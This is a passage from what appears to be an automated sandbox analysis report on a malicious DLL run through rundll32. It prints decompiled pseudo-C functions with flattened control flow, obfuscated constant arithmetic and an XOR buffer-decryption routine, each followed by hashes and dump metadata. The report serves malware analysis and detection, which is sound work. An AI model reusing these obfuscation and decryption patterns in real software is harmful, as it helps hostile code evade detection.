                                                                                                                      				signed int _v28;
                                                                                                                      				unsigned int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				void* _t138;
                                                                                                                      				intOrPtr _t161;
                                                                                                                      				void* _t162;
                                                                                                                      				void* _t164;
                                                                                                                      				signed int _t181;
                                                                                                                      				signed int _t182;
                                                                                                                      				signed int _t183;
                                                                                                                      				void* _t185;
                                                                                                                      				signed int* _t189;
                                                                                                                      
                                                                                                                      				_t162 = __ecx;
                                                                                                                      				_push(1);
                                                                                                                      				_push(1);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t138);
                                                                                                                      				_v16 = 0xdfc885;
                                                                                                                      				_t189 =  &(( &_v76)[8]);
                                                                                                                      				asm("stosd");
                                                                                                                      				_t185 = 0;
                                                                                                                      				_t164 = 0xcc97672;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v32 = 0x60c2fa;
                                                                                                                      				_v32 = _v32 >> 3;
                                                                                                                      				_v32 = _v32 ^ 0x00046f58;
                                                                                                                      				_v76 = 0xb548f0;
                                                                                                                      				_v76 = _v76 >> 0xc;
                                                                                                                      				_t181 = 0xc;
                                                                                                                      				_v76 = _v76 * 0x3c;
                                                                                                                      				_v76 = _v76 + 0xffff64d0;
                                                                                                                      				_v76 = _v76 ^ 0x0001fd54;
                                                                                                                      				_v52 = 0x15927a;
                                                                                                                      				_v52 = _v52 / _t181;
                                                                                                                      				_v52 = _v52 ^ 0x000151ae;
                                                                                                                      				_v56 = 0xd6ed9;
                                                                                                                      				_t182 = 0x1a;
                                                                                                                      				_v56 = _v56 * 0x3f;
                                                                                                                      				_v56 = _v56 + 0xfffffbb4;
                                                                                                                      				_v56 = _v56 ^ 0x0345d46e;
                                                                                                                      				_v64 = 0xba2b53;
                                                                                                                      				_v64 = _v64 * 0x6d;
                                                                                                                      				_v64 = _v64 ^ 0x73d6d9cf;
                                                                                                                      				_v64 = _v64 * 0x31;
                                                                                                                      				_v64 = _v64 ^ 0x981330b4;
                                                                                                                      				_v60 = 0x269f8;
                                                                                                                      				_v60 = _v60 >> 5;
                                                                                                                      				_v60 = _v60 + 0xffffb859;
                                                                                                                      				_v60 = _v60 ^ 0xfff00afd;
                                                                                                                      				_v68 = 0xfd9147;
                                                                                                                      				_v68 = _v68 ^ 0x8de1643f;
                                                                                                                      				_v68 = _v68 / _t182;
                                                                                                                      				_v68 = _v68 >> 0xf;
                                                                                                                      				_v68 = _v68 ^ 0x000df039;
                                                                                                                      				_v72 = 0x5def36;
                                                                                                                      				_v72 = _v72 | 0xd620e1c7;
                                                                                                                      				_v72 = _v72 + 0xd307;
                                                                                                                      				_t183 = 0x48;
                                                                                                                      				_v72 = _v72 / _t183;
                                                                                                                      				_v72 = _v72 ^ 0x02f0e4dc;
                                                                                                                      				_v24 = 0xf7704c;
                                                                                                                      				_v24 = _v24 + 0x27dd;
                                                                                                                      				_v24 = _v24 ^ 0x00ff74b2;
                                                                                                                      				_v28 = 0x151ed9;
                                                                                                                      				_v28 = _v28 * 0x48;
                                                                                                                      				_v28 = _v28 ^ 0x05f046e2;
                                                                                                                      				_v36 = 0xddc4df;
                                                                                                                      				_v36 = _v36 >> 0xf;
                                                                                                                      				_v36 = _v36 | 0x7f83127d;
                                                                                                                      				_v36 = _v36 ^ 0x7f8e5ab1;
                                                                                                                      				_v40 = 0x29fd7f;
                                                                                                                      				_v40 = _v40 >> 7;
                                                                                                                      				_v40 = _v40 | 0x8d3b2756;
                                                                                                                      				_v40 = _v40 ^ 0x8d37b79a;
                                                                                                                      				_v44 = 0x8dc5a8;
                                                                                                                      				_v44 = _v44 * 0x63;
                                                                                                                      				_v44 = _v44 >> 4;
                                                                                                                      				_v44 = _v44 ^ 0x036b3557;
                                                                                                                      				_v48 = 0xd61f7e;
                                                                                                                      				_v48 = _v48 | 0xd43d52c3;
                                                                                                                      				_v48 = _v48 + 0xa376;
                                                                                                                      				_v48 = _v48 ^ 0xd504b7b0;
                                                                                                                      				_t184 = _v20;
                                                                                                                      				while(_t164 != 0x2524be6) {
                                                                                                                      					if(_t164 == 0xcc97672) {
                                                                                                                      						_t164 = 0xe41debb;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						if(_t164 == 0xdd773d9) {
                                                                                                                      							if(E0069D8EC(_v52, _v56,  &_v20, _t184) != 0) {
                                                                                                                      								_t164 = 0xe01b1ec;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t164 == 0xe01b1ec) {
                                                                                                                      								E006A0AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
                                                                                                                      								_t189 =  &(_t189[0xa]);
                                                                                                                      								_t164 = 0x2524be6;
                                                                                                                      								_t185 =  !=  ? 1 : _t185;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t164 != 0xe41debb) {
                                                                                                                      									L13:
                                                                                                                      									if(_t164 != 0x78a313b) {
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									_t161 = E00683DE2(_t164);
                                                                                                                      									_t184 = _t161;
                                                                                                                      									if(_t161 != 0xffffffff) {
                                                                                                                      										_t164 = 0xdd773d9;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t185;
                                                                                                                      				}
                                                                                                                      				E00691E67(_v36, _v40, _v44, _v48, _v20);
                                                                                                                      				_t189 =  &(_t189[3]);
                                                                                                                      				_t164 = 0x78a313b;
                                                                                                                      				goto L13;
                                                                                                                      			}






























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6]
                                                                                                                      • API String ID: 0-3974934468
                                                                                                                      • Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                      • Instruction ID: 7b5e456703eb4397fd30d408aad475fc737a97c51f1131c123a5dd081e297b9f
                                                                                                                      • Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                      • Instruction Fuzzy Hash: D9714071108341AFC758CF25C98941BBBEAFFC9758F505A1DF6969A260C372CA098F47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00685361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				unsigned int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				unsigned int _v32;
                                                                                                                      				void* __edx;
                                                                                                                      				void* _t84;
                                                                                                                      				void* _t104;
                                                                                                                      				void* _t118;
                                                                                                                      				signed int _t120;
                                                                                                                      				signed int _t121;
                                                                                                                      				signed int _t122;
                                                                                                                      				void* _t124;
                                                                                                                      				signed int* _t127;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E006920B9(_t84);
                                                                                                                      				_v4 = 0x18047d;
                                                                                                                      				_t127 =  &(( &_v32)[5]);
                                                                                                                      				_v4 = _v4 >> 0xa;
                                                                                                                      				_v4 = _v4 ^ 0x000d3248;
                                                                                                                      				_t124 = 0;
                                                                                                                      				_v28 = 0x90acd4;
                                                                                                                      				_t104 = 0x35df4ed;
                                                                                                                      				_v28 = _v28 >> 5;
                                                                                                                      				_v28 = _v28 + 0xffff3107;
                                                                                                                      				_v28 = _v28 | 0xd0f9b279;
                                                                                                                      				_v28 = _v28 ^ 0xd0f1daef;
                                                                                                                      				_v8 = 0x9d14b7;
                                                                                                                      				_v8 = _v8 << 2;
                                                                                                                      				_v8 = _v8 ^ 0x027823b1;
                                                                                                                      				_v32 = 0xfd6947;
                                                                                                                      				_v32 = _v32 + 0xffff03bf;
                                                                                                                      				_t120 = 0x72;
                                                                                                                      				_v32 = _v32 / _t120;
                                                                                                                      				_v32 = _v32 >> 0xa;
                                                                                                                      				_v32 = _v32 ^ 0x00066e44;
                                                                                                                      				_v16 = 0x111da;
                                                                                                                      				_v16 = _v16 ^ 0xdd7c73d4;
                                                                                                                      				_v16 = _v16 | 0x7d37165e;
                                                                                                                      				_v16 = _v16 ^ 0xfd769a76;
                                                                                                                      				_v12 = 0x2531de;
                                                                                                                      				_v12 = _v12 << 0xd;
                                                                                                                      				_v12 = _v12 ^ 0xa63e9142;
                                                                                                                      				_v20 = 0x6e0002;
                                                                                                                      				_v20 = _v20 >> 0xe;
                                                                                                                      				_t121 = 0xe;
                                                                                                                      				_v20 = _v20 / _t121;
                                                                                                                      				_t122 = 0x3d;
                                                                                                                      				_v20 = _v20 * 0x64;
                                                                                                                      				_v20 = _v20 ^ 0x000bef19;
                                                                                                                      				_v24 = 0xa3fc95;
                                                                                                                      				_v24 = _v24 + 0xdcd1;
                                                                                                                      				_v24 = _v24 << 3;
                                                                                                                      				_v24 = _v24 / _t122;
                                                                                                                      				_v24 = _v24 ^ 0x0013a2ec;
                                                                                                                      				while(_t104 != 0x311781) {
                                                                                                                      					if(_t104 == 0x35df4ed) {
                                                                                                                      						_push(_t104);
                                                                                                                      						_push(_t104);
                                                                                                                      						_t118 = 0x28;
                                                                                                                      						 *0x6a3e08 = E00687FF2(_t118);
                                                                                                                      						_t104 = 0x605992c;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						if(_t104 == 0x477ef52) {
                                                                                                                      							E0068924B();
                                                                                                                      							_t104 = 0x311781;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t104 == 0x605992c) {
                                                                                                                      								if(E006A0F33() != 0) {
                                                                                                                      									_t104 = 0xdb1ba22;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t104 != 0xdb1ba22) {
                                                                                                                      									L13:
                                                                                                                      									if(_t104 != 0x5723dc8) {
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									_t124 = E0068960D(_v16, _a12, _a8, _v12);
                                                                                                                      									_t127 =  &(_t127[3]);
                                                                                                                      									if(_t124 == 0) {
                                                                                                                      										_t104 = 0x477ef52;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t124;
                                                                                                                      				}
                                                                                                                      				E00698519(_v20, _v24,  *0x6a3e08);
                                                                                                                      				_t104 = 0x5723dc8;
                                                                                                                      				goto L13;
                                                                                                                      			}





















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: H2
                                                                                                                      • API String ID: 0-302591398
                                                                                                                      • Opcode ID: 27d0d1d2dee5e0e592cf025c747fff3e88f18dd55c66b7bc59b9b77318dceff9
                                                                                                                      • Instruction ID: 1856aed6b4487487bfb289db403b9a24ca128d6f140eadb0a1e74ceeeb3e8137
                                                                                                                      • Opcode Fuzzy Hash: 27d0d1d2dee5e0e592cf025c747fff3e88f18dd55c66b7bc59b9b77318dceff9
                                                                                                                      • Instruction Fuzzy Hash: F941CF326083019FC724EF25E54942FBBE2FBD8718F144A1DF58666221D7B1CA88CB97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E00688B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				void* _t83;
                                                                                                                      				void* _t89;
                                                                                                                      				signed int _t93;
                                                                                                                      				void* _t96;
                                                                                                                      				void* _t108;
                                                                                                                      				void* _t109;
                                                                                                                      				void* _t111;
                                                                                                                      				void* _t112;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_t108 = __ecx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t83);
                                                                                                                      				_v72 = 0xbb1237;
                                                                                                                      				_t112 = _t111 + 0x18;
                                                                                                                      				_v72 = _v72 >> 0xf;
                                                                                                                      				_v72 = _v72 + 0xd544;
                                                                                                                      				_t109 = 0;
                                                                                                                      				_v72 = _v72 ^ 0x000eb3e9;
                                                                                                                      				_t96 = 0x815a082;
                                                                                                                      				_v48 = 0x50cb35;
                                                                                                                      				_v48 = _v48 + 0xffff87ec;
                                                                                                                      				_v48 = _v48 ^ 0x00585237;
                                                                                                                      				_v52 = 0xa4cd83;
                                                                                                                      				_v52 = _v52 ^ 0x5b114d95;
                                                                                                                      				_v52 = _v52 ^ 0x5bb6524d;
                                                                                                                      				_v56 = 0xbe8ecf;
                                                                                                                      				_v56 = _v56 << 0xe;
                                                                                                                      				_v56 = _v56 ^ 0xa3b0842f;
                                                                                                                      				_v60 = 0x771210;
                                                                                                                      				_v60 = _v60 | 0x3e44f288;
                                                                                                                      				_v60 = _v60 ^ 0x3e758d5b;
                                                                                                                      				_v80 = 0xf3b10d;
                                                                                                                      				_v80 = _v80 ^ 0x3cb59f0c;
                                                                                                                      				_v80 = _v80 >> 4;
                                                                                                                      				_v80 = _v80 + 0xffffd90b;
                                                                                                                      				_v80 = _v80 ^ 0x03c55d5e;
                                                                                                                      				_v64 = 0x352515;
                                                                                                                      				_v64 = _v64 ^ 0x7339bda5;
                                                                                                                      				_v64 = _v64 + 0x1326;
                                                                                                                      				_v64 = _v64 ^ 0x7306d08c;
                                                                                                                      				_v68 = 0x4f62f3;
                                                                                                                      				_v68 = _v68 << 0xd;
                                                                                                                      				_v68 = _v68 ^ 0x83faab25;
                                                                                                                      				_v68 = _v68 ^ 0x6fa8977d;
                                                                                                                      				_v76 = 0x2ac691;
                                                                                                                      				_v76 = _v76 << 9;
                                                                                                                      				_t93 = 0x6b;
                                                                                                                      				_v76 = _v76 / _t93;
                                                                                                                      				_v76 = _v76 << 0xc;
                                                                                                                      				_v76 = _v76 ^ 0xcae566b9;
                                                                                                                      				do {
                                                                                                                      					while(_t96 != 0x54856a9) {
                                                                                                                      						if(_t96 == 0x815a082) {
                                                                                                                      							_t96 = 0x54856a9;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t96 == 0xa9da54a) {
                                                                                                                      								_t89 = E0069D97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
                                                                                                                      								_t112 = _t112 + 0xc;
                                                                                                                      								__eflags = _t89;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t96 = 0xefea9c1;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								_t118 = _t96 - 0xefea9c1;
                                                                                                                      								if(_t96 != 0xefea9c1) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									E0069D97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
                                                                                                                      									_t109 =  !=  ? 1 : _t109;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t109;
                                                                                                                      					}
                                                                                                                      					E00683DBC( &_v44, _a8, _v72, _v48, _v52);
                                                                                                                      					_t112 = _t112 + 0xc;
                                                                                                                      					_t96 = 0xa9da54a;
                                                                                                                      					L11:
                                                                                                                      					__eflags = _t96 - 0x309e957;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L6;
                                                                                                                      			}






















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7RX
                                                                                                                      • API String ID: 0-861457431
                                                                                                                      • Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                      • Instruction ID: 25810cc74914384e4183b28c016edcf5e0c889aca3a4759649d8d3b612fc85c1
                                                                                                                      • Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
                                                                                                                      • Instruction Fuzzy Hash: 4B4157711097019FCB949F21C48986FBBE2FFC4B88F500A2DF59652220D7718A598F97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E00697BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				void* _t53;
                                                                                                                      				signed int _t60;
                                                                                                                      				signed int _t67;
                                                                                                                      				unsigned int _t71;
                                                                                                                      				signed int _t74;
                                                                                                                      				signed int _t76;
                                                                                                                      				signed int _t77;
                                                                                                                      				void* _t85;
                                                                                                                      				signed int _t92;
                                                                                                                      				void* _t98;
                                                                                                                      				intOrPtr _t99;
                                                                                                                      				signed int* _t100;
                                                                                                                      				signed int* _t101;
                                                                                                                      				signed int* _t102;
                                                                                                                      
                                                                                                                      				_t100 = _a8;
                                                                                                                      				_t102 = __ecx;
                                                                                                                      				_push(_t100);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t53);
                                                                                                                      				_v12 = 0x7b3704;
                                                                                                                      				_t99 = 0;
                                                                                                                      				_v8 = 0x80915f;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v24 = 0xa71362;
                                                                                                                      				_v24 = _v24 << 0xb;
                                                                                                                      				_v24 = _v24 + 0x3e5;
                                                                                                                      				_v24 = _v24 ^ 0x3895df4e;
                                                                                                                      				_v28 = 0xc4b4e;
                                                                                                                      				_t76 = 0x2f;
                                                                                                                      				_v28 = _v28 * 0x14;
                                                                                                                      				_v28 = _v28 | 0x55175d82;
                                                                                                                      				_v28 = _v28 ^ 0x65144985;
                                                                                                                      				_v28 = _v28 ^ 0x30e15ded;
                                                                                                                      				_a8 = 0x3b45b7;
                                                                                                                      				_a8 = _a8 / _t76;
                                                                                                                      				_a8 = _a8 << 4;
                                                                                                                      				_t77 = 0x6c;
                                                                                                                      				_a8 = _a8 / _t77;
                                                                                                                      				_a8 = _a8 ^ 0x000cc8ea;
                                                                                                                      				_t60 =  *_t100;
                                                                                                                      				_t101 =  &(_t100[2]);
                                                                                                                      				_t92 = _t100[1] ^ _t60;
                                                                                                                      				_v20 = _t60;
                                                                                                                      				_v16 = _t92;
                                                                                                                      				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
                                                                                                                      				_t67 = E00687FF2(_t71);
                                                                                                                      				_a8 = _t67;
                                                                                                                      				if(_t67 != 0) {
                                                                                                                      					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
                                                                                                                      					if(_t98 != 0) {
                                                                                                                      						_t74 = _v20;
                                                                                                                      						_t85 = _t67 - _t101;
                                                                                                                      						do {
                                                                                                                      							_t99 = _t99 + 1;
                                                                                                                      							 *(_t85 + _t101) =  *_t101 ^ _t74;
                                                                                                                      							_t101 =  &(_t101[1]);
                                                                                                                      						} while (_t99 < _t98);
                                                                                                                      						_t67 = _a8;
                                                                                                                      					}
                                                                                                                      					if(_t102 != 0) {
                                                                                                                      						 *_t102 = _v16;
                                                                                                                      						return _t67;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				return _t67;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ]0
                                                                                                                      • API String ID: 0-3096761382
                                                                                                                      • Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                      • Instruction ID: 3b864c8ca0c217cde57712be4e2c5fa535e0853dd2da6f4ca0b2b967328975cd
                                                                                                                      • Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
                                                                                                                      • Instruction Fuzzy Hash: FB3177716093008FD758CF29C88594BFBE6EBC9708F108A2EF58993251DBB5E9058B56
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E00683C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				char _v564;
                                                                                                                      				void* _t97;
                                                                                                                      				signed int _t114;
                                                                                                                      				signed int _t115;
                                                                                                                      				signed int _t116;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t97);
                                                                                                                      				_v32 = 0xf161c0;
                                                                                                                      				_v32 = _v32 + 0xffff8ad4;
                                                                                                                      				_v32 = _v32 ^ 0x00fbd9a3;
                                                                                                                      				_v28 = 0xfc9039;
                                                                                                                      				_t114 = 0x1b;
                                                                                                                      				_v28 = _v28 / _t114;
                                                                                                                      				_t115 = 5;
                                                                                                                      				_v28 = _v28 * 0x6e;
                                                                                                                      				_v28 = _v28 ^ 0x040e4771;
                                                                                                                      				_v44 = 0x2ba482;
                                                                                                                      				_v44 = _v44 | 0x0543644d;
                                                                                                                      				_v44 = _v44 ^ 0x0568ae00;
                                                                                                                      				_v36 = 0xddb19;
                                                                                                                      				_t116 = 0x23;
                                                                                                                      				_v36 = _v36 / _t115;
                                                                                                                      				_v36 = _v36 ^ 0x000396ce;
                                                                                                                      				_v8 = 0xc420c0;
                                                                                                                      				_v8 = _v8 >> 8;
                                                                                                                      				_v8 = _v8 + 0xffff6316;
                                                                                                                      				_v8 = _v8 * 0x7a;
                                                                                                                      				_v8 = _v8 ^ 0x001ea2c5;
                                                                                                                      				_v12 = 0xb92025;
                                                                                                                      				_v12 = _v12 >> 3;
                                                                                                                      				_v12 = _v12 + 0xfe32;
                                                                                                                      				_v12 = _v12 << 0xe;
                                                                                                                      				_v12 = _v12 ^ 0x088e8322;
                                                                                                                      				_v24 = 0x144a1a;
                                                                                                                      				_v24 = _v24 + 0xffffa246;
                                                                                                                      				_v24 = _v24 + 0xffff01e3;
                                                                                                                      				_v24 = _v24 ^ 0x001122d6;
                                                                                                                      				_v16 = 0x7d3361;
                                                                                                                      				_v16 = _v16 / _t116;
                                                                                                                      				_v16 = _v16 << 4;
                                                                                                                      				_v16 = _v16 >> 9;
                                                                                                                      				_v16 = _v16 ^ 0x00004840;
                                                                                                                      				_v20 = 0xb3d6e6;
                                                                                                                      				_v20 = _v20 ^ 0x61ac6c83;
                                                                                                                      				_v20 = _v20 ^ 0xeb92407c;
                                                                                                                      				_v20 = _v20 ^ 0x8a8fe9bf;
                                                                                                                      				_v40 = 0xbcf254;
                                                                                                                      				_v40 = _v40 << 0xc;
                                                                                                                      				_v40 = _v40 ^ 0xcf275652;
                                                                                                                      				_push(_v44);
                                                                                                                      				_push(_v28);
                                                                                                                      				E0068A918(_a4, _v40, _v36, _v8, E0069DCF7(_v32, 0x6817c0, _v40), _v12,  &_v564);
                                                                                                                      				E0068A8B0(_v24, _t107, _v16);
                                                                                                                      				return E00691F8A(_v20, _v40,  &_v564);
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: a3}
                                                                                                                      • API String ID: 0-1821053108
                                                                                                                      • Opcode ID: 02f1bd4b80f3132d5abe380d01b1898ef5c1c124be8561517a3b8c2e8bc79277
                                                                                                                      • Instruction ID: e61b9f02ee9bccee1c3a90da77a2006003d3c8f82dd56e3128c20e75083ab1ae
                                                                                                                      • Opcode Fuzzy Hash: 02f1bd4b80f3132d5abe380d01b1898ef5c1c124be8561517a3b8c2e8bc79277
                                                                                                                      • Instruction Fuzzy Hash: C9410271D0020AEBCF48DFE0D94A4EEBBB6FB44304F20819AE510B6260C7B95B55DFA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E00698606(void* __ecx, signed int* __edx, void* __eflags) {
                                                                                                                      				void* _t46;
                                                                                                                      				signed int _t50;
                                                                                                                      				unsigned int* _t63;
                                                                                                                      				signed int _t64;
                                                                                                                      				signed int _t66;
                                                                                                                      				signed int _t72;
                                                                                                                      				unsigned int _t73;
                                                                                                                      				unsigned int _t74;
                                                                                                                      				unsigned int* _t78;
                                                                                                                      				signed int* _t79;
                                                                                                                      				signed int* _t80;
                                                                                                                      				unsigned int _t82;
                                                                                                                      				void* _t88;
                                                                                                                      				void* _t90;
                                                                                                                      				void* _t92;
                                                                                                                      				void* _t93;
                                                                                                                      
                                                                                                                      				_push( *(_t92 + 0x2c));
                                                                                                                      				_push( *(_t92 + 0x2c));
                                                                                                                      				_push( *(_t92 + 0x2c));
                                                                                                                      				_push(__edx);
                                                                                                                      				E006920B9(_t46);
                                                                                                                      				 *(_t92 + 0x20) = 0xe2d3c4;
                                                                                                                      				_t79 =  &(__edx[1]);
                                                                                                                      				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
                                                                                                                      				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
                                                                                                                      				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
                                                                                                                      				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
                                                                                                                      				 *(_t92 + 0x28) = 0xf8496b;
